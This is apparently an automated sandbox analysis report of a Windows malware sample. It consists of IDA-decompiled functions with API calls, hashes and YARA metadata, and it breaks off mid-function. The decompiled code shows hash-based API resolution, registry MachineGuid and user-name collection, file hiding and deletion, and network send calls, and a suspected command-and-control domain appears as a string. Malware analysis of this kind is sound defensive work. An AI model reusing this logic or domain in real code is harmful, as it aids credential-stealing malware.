                            • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$CreateFreeProcessThread_wmemset
                          • String ID: ckav.ru
                          • API String ID: 2915393847-2696028687
                          • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                          • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                          • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                          • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040632F() {
                          				char _v8;
                          				void* _t4;
                          				void* _t7;
                          				void* _t16;
                          
                          				_t16 = E00402B7C(0x208);
                          				if(_t16 == 0) {
                          					L4:
                          					_t4 = 0;
                          				} else {
                          					E0040338C(_t16, 0, 0x104);
                          					_t1 =  &_v8; // 0x4143e8
                          					_v8 = 0x208;
                          					_t7 = E00406069(_t16, _t1); // executed
                          					if(_t7 == 0) {
                          						E00402BAB(_t16);
                          						goto L4;
                          					} else {
                          						_t4 = _t16;
                          					}
                          				}
                          				return _t4;
                          			}







                          0x00406340
                          0x00406345
                          0x00406373
                          0x00406373
                          0x00406347
                          0x0040634f
                          0x00406354
                          0x00406357
                          0x0040635c
                          0x00406366
                          0x0040636d
                          0x00000000
                          0x00406368
                          0x00406368
                          0x00406368
                          0x00406366
                          0x0040637a

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser_wmemset
                          • String ID: CA
                          • API String ID: 2078537776-1052703068
                          • Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                          • Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                          				int _t7;
                          				void* _t8;
                          
                          				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                          				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                          				return _t7;
                          			}





                          0x00406094
                          0x004060a8
                          0x004060ab

                          APIs
                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: InformationToken
                          • String ID: IDA
                          • API String ID: 4114910276-365204570
                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                          				_Unknown_base(*)()* _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                          				_t1 =  &_a8; // 0x403173
                          				_t5 = GetProcAddress(_a4,  *_t1); // executed
                          				return _t5;
                          			}





                          0x00402c10
                          0x00402c15
                          0x00402c1b
                          0x00402c1e

                          APIs
                          • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc
                          • String ID: s1@
                          • API String ID: 190572456-427247929
                          • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                          • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E00404A52(void* _a4, char* _a8, char* _a12) {
                          				void* _v8;
                          				int _v12;
                          				void* __ebx;
                          				char* _t10;
                          				long _t13;
                          				char* _t27;
                          
                          				_push(_t21);
                          				_t27 = E00402B7C(0x208);
                          				if(_t27 == 0) {
                          					L4:
                          					_t10 = 0;
                          				} else {
                          					E00402B4E(_t27, 0, 0x208);
                          					_v12 = 0x208;
                          					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                          					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                          					if(_t13 != 0) {
                          						E00402BAB(_t27);
                          						goto L4;
                          					} else {
                          						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                          						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                          						E00404A39(_v8); // executed
                          						_t10 = _t27;
                          					}
                          				}
                          				return _t10;
                          			}









                          0x00404a56
                          0x00404a65
                          0x00404a6a
                          0x00404ad1
                          0x00404ad1
                          0x00404a6c
                          0x00404a71
                          0x00404a79
                          0x00404a85
                          0x00404a9a
                          0x00404a9e
                          0x00404acb
                          0x00000000
                          0x00404aa0
                          0x00404aac
                          0x00404abc
                          0x00404ac1
                          0x00404ac6
                          0x00404ac6
                          0x00404a9e
                          0x00404ad9

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                          • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateOpenProcessQueryValue
                          • String ID:
                          • API String ID: 1425999871-0
                          • Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                          • Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402BAB(void* _a4) {
                          				void* _t3;
                          				char _t5;
                          
                          				if(_a4 != 0) {
                          					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                          					return _t5;
                          				}
                          				return _t3;
                          			}





                          0x00402bb2
                          0x00402bc0
                          0x00000000
                          0x00402bc0
                          0x00402bc7

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                          • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$FreeProcess
                          • String ID:
                          • API String ID: 3859560861-0
                          • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                          • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                          • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                          • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E004060BD(void* __eflags) {
                          				signed int _v8;
                          				char _v12;
                          				short _v16;
                          				char _v20;
                          				void* __ebx;
                          				intOrPtr* _t12;
                          				signed int _t13;
                          				intOrPtr* _t14;
                          				signed int _t15;
                          				void* _t24;
                          
                          				_v16 = 0x500;
                          				_v20 = 0;
                          				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                          				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                          				_v8 = _t13;
                          				if(_t13 != 0) {
                          					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                          					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                          					asm("sbb eax, eax");
                          					_v8 = _v8 &  ~_t15;
                          					E0040604F(_v12);
                          					return _v8;
                          				}
                          				return _t13;
                          			}













                          0x004060c6
                          0x004060d5
                          0x004060d8
                          0x004060f4
                          0x004060f6
                          0x004060fb
                          0x0040610a
                          0x00406115
                          0x0040611c
                          0x0040611e
                          0x00406121
                          0x00000000
                          0x0040612a
                          0x0040612f

                          APIs
                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: CheckMembershipToken
                          • String ID:
                          • API String ID: 1351025785-0
                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                          				void* _t3;
                          				int _t5;
                          
                          				_t3 = E00403D4D(__eflags, _a4); // executed
                          				if(_t3 == 0) {
                          					__eflags = 0;
                          					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                          					_t5 = CreateDirectoryW(_a4, 0); // executed
                          					return _t5;
                          				} else {
                          					return 1;
                          				}
                          			}





                          0x00403c68
                          0x00403c70
                          0x00403c78
                          0x00403c82
                          0x00403c8b
                          0x00403c8f
                          0x00403c72
                          0x00403c76
                          0x00403c76

                          APIs
                          • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateDirectory
                          • String ID:
                          • API String ID: 4241100979-0
                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E0040642C(void* __eflags) {
                          				short _v40;
                          				intOrPtr* _t6;
                          				void* _t10;
                          
                          				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                          				 *_t6( &_v40); // executed
                          				return 0 | _v40 == 0x00000009;
                          			}






                          0x0040643c
                          0x00406445
                          0x00406454

                          APIs
                          • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID:
                          • API String ID: 1721193555-0
                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				intOrPtr _t5;
                          
                          				_t5 = _a12;
                          				if(_t5 == 0) {
                          					_t5 = E00405D0B(_a8) + 1;
                          				}
                          				__imp__#19(_a4, _a8, _t5, 0); // executed
                          				return _t5;
                          			}




                          0x00404eed
                          0x00404ef2
                          0x00404efd
                          0x00404efd
                          0x00404f07
                          0x00404f0e

                          APIs
                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                          • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                          				int _t6;
                          				void* _t7;
                          
                          				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                          				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                          				return _t6;
                          			}





                          0x00403bdd
                          0x00403beb
                          0x00403bee

                          APIs
                          • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040427D(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                          				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                          				return _t4;
                          			}





                          0x0040428a
                          0x00404297
                          0x0040429a

                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                          • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404A19(void* _a4, short* _a8, void** _a12) {
                          				long _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                          				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                          				return _t5;
                          			}





                          0x00404a27
                          0x00404a35
                          0x00404a38

                          APIs
                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                          • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C40(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                          				_t4 = FindCloseChangeNotification(_a4); // executed
                          				return _t4;
                          			}





                          0x00403c4d
                          0x00403c55
                          0x00403c58

                          APIs
                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                          • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C08(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                          				_t4 = DeleteFileW(_a4); // executed
                          				return _t4;
                          			}





                          0x00403c15
                          0x00403c1d
                          0x00403c20

                          APIs
                          • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0
                          • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                          • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402C1F(WCHAR* _a4) {
                          				struct HINSTANCE__* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                          				_t4 = LoadLibraryW(_a4); // executed
                          				return _t4;
                          			}





                          0x00402c2c
                          0x00402c34
                          0x00402c37

                          APIs
                          • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                          • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BEF(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                          				_t4 = FindClose(_a4); // executed
                          				return _t4;
                          			}





                          0x00403bfc
                          0x00403c04
                          0x00403c07

                          APIs
                          • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                          • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BB7(WCHAR* _a4) {
                          				long _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                          				_t4 = GetFileAttributesW(_a4); // executed
